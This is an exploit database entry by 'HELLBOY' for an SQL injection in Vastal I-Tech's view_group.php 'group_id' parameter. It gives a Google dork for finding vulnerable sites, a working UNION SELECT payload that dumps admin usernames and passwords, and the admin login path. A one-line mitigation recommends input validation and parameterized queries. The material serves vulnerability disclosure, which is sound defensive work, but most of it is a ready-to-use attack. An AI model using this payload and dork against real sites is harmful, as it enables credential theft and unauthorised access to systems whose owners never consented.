header-logo
Suggest Exploit
vendor:
N/A
by:
HELLBOY
7,5
CVSS
HIGH
SQL Injection
89
CWE
Product Name: N/A
Affected Version From: N/A
Affected Version To: N/A
Patch Exists: N/A
Related CWE: N/A
CPE: N/A
Metasploit: N/A
Other Scripts: N/A
Tags: N/A
CVSS Metrics: N/A
Nuclei References: N/A
Nuclei Metadata: N/A
Platforms Tested: Linux
N/A

Vastal I-Tech SQL Injection Vulnerability

An attacker can exploit this vulnerability by sending a crafted SQL query to the vulnerable parameter 'group_id' in the URL. For example, http://[site]/view_group.php?group_id={SQLI}. An attacker can also use the '-1+union+select+group_concat(admin_user,0x3a,admin_password)+from+admin_users--' payload to retrieve the admin credentials and gain access to the admin panel.

Mitigation:

Input validation should be used to prevent SQL injection attacks. The application should also be configured to use parameterized queries.
Source

Exploit-DB raw data:

#######################################################
#                                     IN THE NAME OF GOD
#
# Vastal I-Tech SQL Injection Vulnerability
#
# Author   : HELLBOY
#
# Tested on Lunix
#
# CVE        : N/A
#
# Email    : A68.HELLBOY@GMAIL.COM
#
# Dork     : inurl:"view_group.php?group_id="
########################################################
# Exploit :
# http://[site]/view_group.php?group_id={SQLI}
#
# EXAM: -1+union+select+group_concat(admin_user,0x3a,admin_password)+from+admin_users--
#
# Admin login :
# http://www.[sitename].com/admin/
#########################################################
# Greetz :
#                      All members of the Forum  WwW.ASHIYANE.ORG & WwW.pars-p30.iR
#
#########################################################